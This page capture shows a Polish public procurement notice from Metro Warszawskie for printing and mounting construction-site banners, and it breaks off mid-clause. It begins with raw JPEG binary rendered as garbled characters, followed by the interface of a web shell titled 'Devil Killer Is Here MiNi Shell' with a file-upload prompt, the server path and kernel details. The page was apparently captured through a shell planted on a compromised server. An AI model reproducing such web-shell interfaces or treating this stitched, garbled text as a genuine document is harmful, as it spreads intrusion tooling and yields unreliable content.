JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230502/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230502/0020026401-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Reklama zewnętrzna dla odcinka 3+Karolin </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">METRO WARSZAWSKIE SPÓŁKA Z OGRANICZONĄ ODPOWIEDZIALNOŚCIĄ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 015314592</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Wilczy Dół 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">02-798</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zam-eh@metro.waw.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://postepowania.metro.waw.pl/servlet/HomeServlet</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający sektorowy - art. 5 ust. 1 pkt 1 - usługi transportowe</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Reklama zewnętrzna dla odcinka 3+Karolin </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-44af7367-cfc1-11ed-b70f-ae2d9e28ec7b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00200264</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-05-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://postepowania.metro.waw.pl/servlet/HomeServlet <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Platforma Zakupowa Zamawiającego, znajdująca się pod adresem: https://postepowania.metro.waw.pl/servlet/HomeServlet<br/>Zamawiający dla dokumentów innych niż oferta i załączniki do oferty może dopuścić zastosowanie poczty e-mail: zam-eh@metro.waw.pl w wyjątkowych sytuacjach, o których zadecyduje Zamawiający. Wykonawca nie może sam podjąć takiej inicjatywy.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Ofertę wraz z załącznikami należy przesłać w formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym (e-dowód).<br/>Szczegółowe wymagania techniczne i organizacyjne dot. korespondencji elektronicznej zawarte są w pkt 16.2 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia <br/>27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016 r., str. 1), dalej „RODO”, Zamawiający informuje, że:<br/>1)	Administratorem danych osobowych osób fizycznych występujących w imieniu Wykonawcy , zwanych dalej „Danymi osobowymi”, jest Miasto Stołeczne Warszawa, reprezentowane przez Zarząd Transportu Miejskiego, w imieniu i na rzecz którego działa Metro Warszawskie Sp. z o.o., z siedzibą w Warszawie (02-798), ul. Wilczy Dół 5, tel. centrala: +48 22 655 40 00;<br/>2)	Kontakt do inspektora danych osobowych w Metrze Warszawskim Sp. z o.o. e-mail: iod@metro.waw.pl;<br/>3)	Dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z niniejszym postępowaniem.<br/>4)	Odbiorcami Danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 Ustawy z dnia 11.09.2019 r. Prawo zamówień publicznych (tj. Dz. U. z 2022 r. poz. 1710, z późn. zm.- dalej „ustawa Pzp”);<br/>5)	Dane osobowe będą przechowywane przez okres 4 pełnych lat kalendarzowych liczonych od dnia 1 stycznia roku następnego od daty zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6)	Obowiązek podania Danych osobowych bezpośrednio dotyczących osób fizycznych występujących w imieniu Wykonawcy jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/>7)	W odniesieniu do Danych Osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>8)	Osoby fizyczne występujące w imieniu Wykonawcy mają:<br/>­	na podstawie art. 15 RODO prawo dostępu do Danych Osobowych ich dotyczących;<br/>­	na podstawie art. 16 RODO prawo do sprostowania ich Danych Osobowych; <br/>­	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania Danych Osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ;<br/>­	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy ww. osoba fizyczna uzna, że przetwarzanie jej Danych Osobowych narusza przepisy RODO lub ustawy z dnia 10 maja 2018 r. o ochronie danych osobowych (t. j. Dz. U. z 2019 r. poz. 1781);<br/>9)	Osobie fizycznej występującej w imieniu Wykonawcy nie przysługuje:<br/>­	prawo do usunięcia Danych Osobowych o którym mowa w art. 17 ust. 3 lit. b, d lub e RODO;<br/>­	prawo do przenoszenia Danych Osobowych, o którym mowa w art. 20 RODO;<br/>­	prawo sprzeciwu, wobec przetwarzania Danych Osobowych, o którym mowa w art. 21 RODO, gdyż podstawą prawną przetwarzania Danych Osobowych dotyczących ww. osoby fizycznej jest art. 6 ust. 1 lit. c RODO.<br/>10)	W przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 (prawo dostępu przysługujące osobie, której dane dotyczą) rozporządzenia 2016/679, wymagałoby niewspółmiernie dużego wysiłku, zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub konkursu.<br/>11)	W przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 (prawo dostępu przysługujące osobie, której dane dotyczą) – rozporządzenia 2016/679, wymagałoby niewspółmiernie dużego wysiłku, zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających w szczególności na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">c.d. pkt 3.15. RODO (obowiązek informacyjny):<br/>12)	Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 (prawo do ograniczenia przetwarzania) rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego lub konkursu.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WP.25.00053.2023.K.D.ANDZ</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zgodnie z pkt 4.1-4.11 oraz 8.1-8.5 SWZ tj.:<br/>4.1	Przedmiotem Zamówienia jest usługa pn. „Reklama zewnętrzna dla odcinka 3+Karolin”.<br/>4.2	Przedmiot Zamówienia obejmuje wydrukowanie oraz zamontowanie na ogrodzeniach placów budów banerów informacyjnych dotyczących przyszłych stacji metra III etapu realizacji odcinka zachodniego II linii metra w Warszawie oraz Stacji Techniczno-Postojowej Karolin (3+ STP Karolin) w zakresie:<br/>4.2.1 Podstawowym: 20 szt. banerów informacyjnych<br/>4.2.2 Opcjonalnym: max. 60 szt. banerów informacyjnych<br/>4.3	Przedmiot Zamówienia jest częścią projektu pn. „Budowa II linii metra wraz z zakupem taboru – etap III”. W przypadku otrzymania dofinansowania z funduszy Unii Europejskiej, obejmującego Przedmiot Zamówienia Wykonawca będzie zobowiązany do stosowania wymogów związanych z promocją projektu, tj. zamieszczenia na banerach logo programu oraz informacji o udziale Unii Europejskiej we współfinansowaniu projektu.<br/>4.4	Zamawiający przewiduje możliwość zastosowania prawa opcji, o której mowa w art. 441 ustawy Pzp co oznacza, że gdy zajdzie taka potrzeba np. z powodu całkowitego zniszczenia eksponowanych banerów (nieobjętego gwarancją) lub konieczności montażu dodatkowych banerów, możliwy będzie wydruk dodatkowych banerów i ich montaż po cenie zawartej w ofercie wybranego Wykonawcy.<br/>4.5	Prawo opcji jest uprawnieniem Zamawiającego, z którego może, ale nie musi skorzystać <br/>w ramach realizacji Przedmiotu Zamówienia. W przypadku nieskorzystania przez Zamawiającego z prawa opcji, Wykonawcy nie przysługują żadne roszczenia z tego tytułu.<br/>4.6	Opcjonalny zakres Przedmiotu Zamówienia został określony w pkt 4.2.2 SWZ i będzie realizowany wyłącznie po uprzednim otrzymaniu przez Wykonawcę powiadomienia e-mailem o decyzji skorzystania z prawa opcji.<br/>4.7	Szczegółowy zakres prac objętych Przedmiotem Zamówienia określa Specyfikacja Techniczna stanowiąca Załącznik nr 1 do SWZ (dalej: „ST”).<br/>4.8	Przedmiot Zamówienia zostanie zrealizowany zgodnie z dokumentacją postępowania, tj. SWZ i jej załącznikami, w szczególności ST oraz ze Wzorem Umowy (Załącznik nr 3 do SWZ).<br/>4.9	Zamawiający wymaga zatrudnienia na podstawie umowy o pracę w rozumieniu przepisów ustawy z dnia 26 czerwca 1974 r. – Kodeks pracy (t.j. Dz. U. z 2022, poz. 1510 z późn. zm.), przez Wykonawcę lub Podwykonawcę, osób wykonujących czynności w trakcie realizacji Przedmiotu Zamówienia, tj.:<br/>4.9.1	druk banerów;<br/>4.9.2	transport;<br/>4.9.3	montaż banerów.<br/>4.10	Powody niedokonania podziału zamówienia na części: art. 91 ust. 2 ustawy Pzp:<br/>Z uwagi na charakter Przedmiotu Zamówienia, tj. wykonanie jednorodnego i integralnego dzieła, brak jest możliwości podziału zamówienia na części.<br/>4.11	Wykonawca udzieli gwarancji na wykonany Przedmiot Zamówienia (zgodnie z warunkami określonymi w pkt V ppkt 4 i 5 ST) na okres 12 miesięcy lub dłuższy – zgodnie ze złożoną ofertą.<br/>TERMIN WYKONANIA PRZEDMIOTU ZAMÓWIENIA:<br/>8.1	Termin realizacji Przedmiotu Zamówienia (termin realizacji umowy w zakresie podstawowym i opcjonalnym): 36 miesięcy od daty zawarcia umowy.<br/>8.2	Zamawiający przekaże Wykonawcy Projekty graficzne banerów w zakresie podstawowym w terminie 5 dni roboczych od daty zawarcia umowy (dni robocze – dni kalendarzowe od poniedziałku do piątku, z wyłączeniem dni ustawowo wolnych od pracy obowiązujące na terenie Rzeczpospolitej Polskiej).<br/>8.3	Zamawiający przekaże Wykonawcy Projekty graficzne banerów w zakresie opcjonalnym w trakcie trwania umowy przy założeniu, że ostatnia partia banerów zlecona do wydrukowania w ramach prawa opcji zostanie przesłana do Wykonawcy nie później niż 1 miesiąc przed końcem terminu realizacji umowy.<br/>8.4	Wykonawca w ciągu 8 dni roboczych od dnia otrzymania projektów graficznych od Zamawiającego (dot. zamówienia podstawowego i zamówienia opcjonalnego), wydrukuje, dostarczy oraz zamontuje Przedmiot Zamówienia.<br/>8.5	W przypadku wydrukowania banerów niezgodnie z przesłanymi przez Zamawiającego projektami, Wykonawca w ciągu 5 dni roboczych, od momentu zgłoszenia nieprawidłowości, wdrukuje, dostarczy oraz zamontuje banery wydrukowane poprawnie, zgodnie z uwagami Zamawiającego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">22462000-6 - Materiały reklamowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Opcjonalny zakres Przedmiotu Zamówienia został określony powyżej w pkt 4.2.2 SWZ tj.: wydrukowanie oraz zamontowanie na ogrodzeniach placów budów banerów informacyjnych dotyczących przyszłych stacji metra III etapu realizacji odcinka zachodniego II linii metra w Warszawie oraz Stacji Techniczno-Postojowej Karolin (3+ STP Karolin) w zakresie:<br/>4.2.2 Opcjonalnym: max. 60 szt. banerów informacyjnych.<br/>Zakres opcjonalny będzie realizowany wyłącznie po uprzednim otrzymaniu przez Wykonawcę powiadomienia e-mailem o decyzji skorzystania z prawa opcji. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">36 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zgodnie z pkt 23 SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykonawca ZAŁĄCZA DO OFERTY, aktualne na dzień składania ofert:<br/>a)	oświadczenie Wykonawcy o niepodleganiu wykluczeniu z postępowania składane na podstawie art. 125 ust. 1 w zw. z art. 273 ust. 2 ustawy Pzp, wg wzoru stanowiącego Załącznik nr 2 do SWZ.<br/>Wykonawca NA WEZWANIE złoży w wyznaczonym terminie (min. 5 dni), aktualne na dzień złożenia następujące oświadczenia i dokumenty (podmiotowe środki dowodowe): <br/>1. na potwierdzenie braku podstaw wykluczenia Wykonawcy na podstawie art. 109 ust. 1 pkt 4 ustawy Pzp – odpis lub informację z właściwego rejestru lub centralnej ewidencji i informacji o działalności gospodarczej sporządzone nie wcześniej niż 3 miesiące przed ich złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.<br/>2. oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu złożonym wraz z ofertą zgodnie z pkt 11.1 lit. a) SWZ, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego, wg wzoru stanowiącego Załącznik nr 4 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia przez Wykonawców przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykonawca załącza do oferty pełnomocnictwo upoważniające do złożenia oferty (jeżeli dotyczy).<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają odpowiednio do oferty:<br/>1) oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy,<br/>2) pełnomocnictwo do reprezentowania w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia, w rozumieniu art. 58 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (t. j. Dz. U. z 2022 r. poz. 1710 z późn. zm. – dalej „ustawa Pzp”) ustanawiają pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo należy dołączyć do oferty w formie elektronicznej, z uwzględnieniem postanowień pkt 16.1.4 SWZ. Wszelka korespondencja prowadzona będzie wyłącznie z ustanowionym pełnomocnikiem. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają ponadto do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający dopuszcza możliwość zmian postanowień zawartej Umowy w następującym zakresie i w przypadku zaistnienia następujących okoliczności:<br/>1)	zmiany terminów określonych w Umowie, w przypadku wystąpienia przyczyn wskazanych poniżej w lit. a)-d), maksymalnie o okres ich trwania, o ile ich wystąpienie będzie miało wpływ na terminy określone w Umowie:<br/>a)	przerwania lub opóźnienia w wykonywaniu Przedmiotu Umowy spowodowanego okolicznościami, za które Wykonawca nie ponosi odpowiedzialności,<br/>b)	zmian przepisów prawa, mających wpływ na termin wykonania Przedmiotu Umowy lub sposób wykonywania Przedmiotu Umowy,<br/>c)	opóźnień w rozpoczęciu lub wykonywaniu Przedmiotu Umowy powstałych z przyczyn nieleżących po stronie Wykonawcy, których nie można było przewidzieć w chwili zawarcia Umowy, przy zachowania należytej staranności,<br/>d)	opóźnień w realizacji Przedmiotu Umowy wynikłych z winy Zamawiającego lub innych wykonawców, za które Wykonawca nie ponosi odpowiedzialności;<br/>2)	zmiana ceny umownej w przypadku ustawowej zmiany stawki podatku od towarów i usług;<br/>3)	zmiany zakresu części Przedmiotu Umowy powierzonych Podwykonawcom, wskazanej w § 9 ust. 2;<br/>4)	zmiany w wymaganej sprawozdawczości i rozliczeniach kosztów wykonania Przedmiotu Umowy;<br/>5)	zmiany oznaczenia danych dotyczących Zamawiającego lub Wykonawcy;<br/>6)	zmiany wynikające z 